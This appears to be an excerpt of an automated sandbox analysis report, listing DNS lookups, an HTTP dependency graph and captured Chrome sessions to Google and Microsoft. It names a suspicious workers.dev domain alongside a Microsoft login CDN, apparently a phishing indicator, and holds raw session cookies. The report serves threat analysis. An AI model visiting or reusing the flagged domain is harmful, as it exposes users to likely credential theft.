Apr 29, 2024 01:11:41.074820042 CEST	1.1.1.1	192.168.2.4	0x6dd2	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev			65	IN (0x0001)	false
Apr 29, 2024 01:11:42.385658026 CEST	1.1.1.1	192.168.2.4	0x2c07	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		104.21.55.4	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:42.385658026 CEST	1.1.1.1	192.168.2.4	0x2c07	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev		172.67.143.195	A (IP address)	IN (0x0001)	false
Apr 29, 2024 01:11:42.387295008 CEST	1.1.1.1	192.168.2.4	0xa059	No error (0)	vbvfdvdjvv.fyfyvfytvghv.workers.dev			65	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

fs.microsoft.com

slscr.update.microsoft.com

vbvfdvdjvv.fyfyvfytvghv.workers.dev

https:

www.linkpicture.com

aadcdn.msauth.net

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:12 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:13 UTC	1703	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:12 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-8gwIPWzLKX-iicPSRzgr0Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-28 23:11:13 UTC	771	IN	Data Raw: 32 66 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 72 61 6e 6b 20 63 73 6f 72 62 61 20 64 65 61 74 68 22 2c 22 70 6f 77 65 72 62 61 6c 6c 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 2c 22 77 77 65 20 73 6d 61 63 6b 64 6f 77 6e 20 64 72 61 66 74 20 70 69 63 6b 73 22 2c 22 70 76 65 20 65 73 63 61 70 65 20 66 72 6f 6d 20 74 61 72 6b 6f 76 22 2c 22 6e 62 61 20 6b 6e 69 63 6b 73 20 37 36 65 72 73 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 20 74 6f 64 61 79 22 2c 22 63 6f 63 20 6d 79 73 74 65 72 69 6f 75 73 20 6f 62 6a 65 63 74 73 22 2c 22 70 72 69 6d 65 20 65 6e 65 72 67 79 20 64 72 69 6e 6b 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f Data Ascii: 2fc)]}'["",["frank csorba death","powerball lottery numbers","wwe smackdown draft picks","pve escape from tarkov","nba knicks 76ers","spacex falcon 9 rocket launch today","coc mysterious objects","prime energy drink"],["","","","","","","",""],[],{"goo
2024-04-28 23:11:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:12 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:12 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:13 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGJCvu7EGIjAVFeFXZ3cxMO0krL__GxSD10I8mSsWmyN1j1S6OFdhtkIYAXNkOrF93XGZRsvJ13AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIka-7sQYQkdy4tQESBFG1Plo Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sun, 28 Apr 2024 23:11:13 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-28-23; expires=Tue, 28-May-2024 23:11:13 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=FdYEraNlQnjbW3cXFYuO3m5ViCRSFyx4ogU5Hjqkmdf2RQ7DBM2S3GxPQkMWjg-H4-6fB09YAdH3CiBJQ5GOVLguBNIAakTGn704IBzI4hEniNEYY70k_PT5y32gBwgDtRkb85sm365aNs--v2i9kFsWG0wyyDKcQ9YidR3X6Mk; expires=Mon, 28-Oct-2024 23:11:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:11:13 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:12 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:13 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGJCvu7EGIjDMSzESXqZsVuec-K5gSL0dyPdiFMcnhBa2SK6Q33b-OjeLxfU0N_Vj-xNo_exqK2MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIka-7sQYQmbTarAESBFG1Plo Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sun, 28 Apr 2024 23:11:13 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-28-23; expires=Tue, 28-May-2024 23:11:13 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=ZRSg5KRo-RNSBhzCbMi1LPoRw9afq6SULUZmgydHdDPsYd6p-Fkb-Efg9kWv_mXgEtfkccXN2lZfDkg1kDP2X4nE1CMsMQ4EgmhSXXifj-b6BexBmuUlEMfbDLXGcpGSGAm0LF7dqJ06vkvvLTOVBel54q1-zjGwDdJJ65_xOPM; expires=Mon, 28-Oct-2024 23:11:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:11:13 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:14 UTC	920	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGJCvu7EGIjAVFeFXZ3cxMO0krL__GxSD10I8mSsWmyN1j1S6OFdhtkIYAXNkOrF93XGZRsvJ13AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-28-23; NID=513=ZRSg5KRo-RNSBhzCbMi1LPoRw9afq6SULUZmgydHdDPsYd6p-Fkb-Efg9kWv_mXgEtfkccXN2lZfDkg1kDP2X4nE1CMsMQ4EgmhSXXifj-b6BexBmuUlEMfbDLXGcpGSGAm0LF7dqJ06vkvvLTOVBel54q1-zjGwDdJJ65_xOPM
2024-04-28 23:11:14 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sun, 28 Apr 2024 23:11:14 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3183 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:11:14 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-28 23:11:14 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6d 50 79 42 43 76 59 53 54 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="mPyBCvYST
2024-04-28 23:11:14 UTC	1029	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	142.250.191.196	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:14 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGJCvu7EGIjDMSzESXqZsVuec-K5gSL0dyPdiFMcnhBa2SK6Q33b-OjeLxfU0N_Vj-xNo_exqK2MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-28-23; NID=513=ZRSg5KRo-RNSBhzCbMi1LPoRw9afq6SULUZmgydHdDPsYd6p-Fkb-Efg9kWv_mXgEtfkccXN2lZfDkg1kDP2X4nE1CMsMQ4EgmhSXXifj-b6BexBmuUlEMfbDLXGcpGSGAm0LF7dqJ06vkvvLTOVBel54q1-zjGwDdJJ65_xOPM
2024-04-28 23:11:14 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sun, 28 Apr 2024 23:11:14 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3111 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-28 23:11:14 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-28 23:11:14 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 63 69 33 38 4e 39 38 52 2d 57 59 4d 6d 31 67 7a 71 64 32 4e 6e 58 72 44 4d 61 69 2d 75 77 4d 66 4d Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="ci38N98R-WYMm1gzqd2NnXrDMai-uwMfM
2024-04-28 23:11:14 UTC	957	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	23.11.208.106	443

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:21 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
